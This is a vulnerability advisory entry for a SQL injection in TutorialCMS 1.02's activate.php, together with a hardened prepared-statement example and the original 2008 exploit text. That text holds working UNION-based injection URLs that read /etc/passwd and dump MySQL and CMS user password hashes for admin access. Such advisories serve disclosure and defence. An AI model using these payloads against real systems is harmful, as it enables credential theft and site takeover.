Vendor: TutorialCMS
By: ka0x
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: TutorialCMS
Affected Version From: 01.02
Affected Version To: 01.02
Patch Exists: YES
Related CWE: N/A
CPE: a:wavelinkmedia:tutorialcms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

TutorialCMS 1.02 Remote SQL Injection Vulnerability

A SQL injection vulnerability exists in the activate.php file of TutorialCMS 1.02: the userName and activate request parameters are placed directly into a SQL query. When PHP's magic_quotes_gpc setting is off, an attacker can use the vulnerability to read data from the database and gain access to the admin panel. Passwords are stored as MD5 hashes.

Mitigation:

Ensure that the magic_quotes_gpc setting is enabled and that all user input is properly sanitized.
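As an added example (not TutorialCMS's own code), the activate.php lookup quoted in the Exploit-DB data below rewritten with a mysqli prepared statement, so the userName and activate parameters are bound as data rather than concatenated into the query; the database connection details are assumed, and the fix does not depend on magic_quotes_gpc at all (that setting was removed in PHP 5.4, so it cannot be relied on as a control).

```php
<?php
// Added example, not TutorialCMS's code: hardened form of the activate.php
// query from the advisory. Assumes a mysqli connection and a `users` table
// with `username` and `activated` columns, as in the original snippet.
declare(strict_types=1);

function activateAccount(mysqli $db, string $userName, string $code): bool
{
    // Defence in depth: reject values that can never be a valid username or
    // activation code before they reach the database. This is not the fix.
    if (!preg_match('/^[A-Za-z0-9_.-]{1,64}$/', $userName) ||
        !preg_match('/^[A-Za-z0-9]{1,64}$/', $code)) {
        return false;
    }

    // The fix: input is bound as a parameter, never spliced into the SQL
    // text, so a quote or a /**/union/**/select sequence in the value is
    // compared as a string literal instead of being parsed as SQL.
    $stmt = $db->prepare(
        'SELECT activated FROM users WHERE username = ? AND activated = ?'
    );
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('ss', $userName, $code);
    $stmt->execute();
    $stmt->store_result();
    $found = $stmt->num_rows === 1;
    $stmt->close();
    return $found;
}

// Usage mirroring the original script: parameters arrive via $_GET.
// Connection credentials below are placeholders for this example.
$db = new mysqli('localhost', 'cms_user', 'cms_pass', 'tutorialcms');
$db->set_charset('utf8mb4');
$userName = $_GET['userName'] ?? '';
$code     = $_GET['activate'] ?? '';

if (activateAccount($db, $userName, $code)) {
    echo 'Account activated.';
} else {
    // Same message for unknown user and wrong code: no enumeration oracle.
    echo 'Activation failed.';
}
```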

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 TutorialCMS 1.02 Remote SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

bug found by ka0x
contact: ka0x01[at]gmail.com
D.O.M TEAM 2008
we are: ka0x, an0de, xarnuz
#from spain

download http://www.wavelinkmedia.com/scripts/tutorialcms/

need magic_quotes_gpc = off

vulnerability in activate.php

vuln code:
[...]

$userName = $_GET["userName"];   // taken from the query string without escaping
$code     = $_GET["activate"];   // likewise
// both values are concatenated straight into the SQL string, so a quote in
// userName closes the literal and the rest of the value is parsed as SQL
$sql = "SELECT activated FROM users WHERE username = '$userName' AND activated = '$code'";

[...]

/etc/password:
http://[host]/activate.php?userName='/**/union/**/select/**/1,2,3,4,load_file(0x2f6574632f706173737764),6,7,8,9,9,9,9,9/*

User and Password from mysql.user:
http://[host]/activate.php?userName='/**/union/**/select/**/1,2,3,4,concat(user,0x203a3a20,password),6,7,8,9,9,9,9,9/**/from/**/mysql.user/*

POC: http://[host]/activate.php?userName='/**/union/**/select/**/1,2,3,4,concat(0x757365723a20,username,0x20706173733a20,password),6,7,8,9,9,9,9,9/**/from/**/users/*

The encryption of the password is MD5
login: http://[host]/admin

# milw0rm.com [2008-01-12]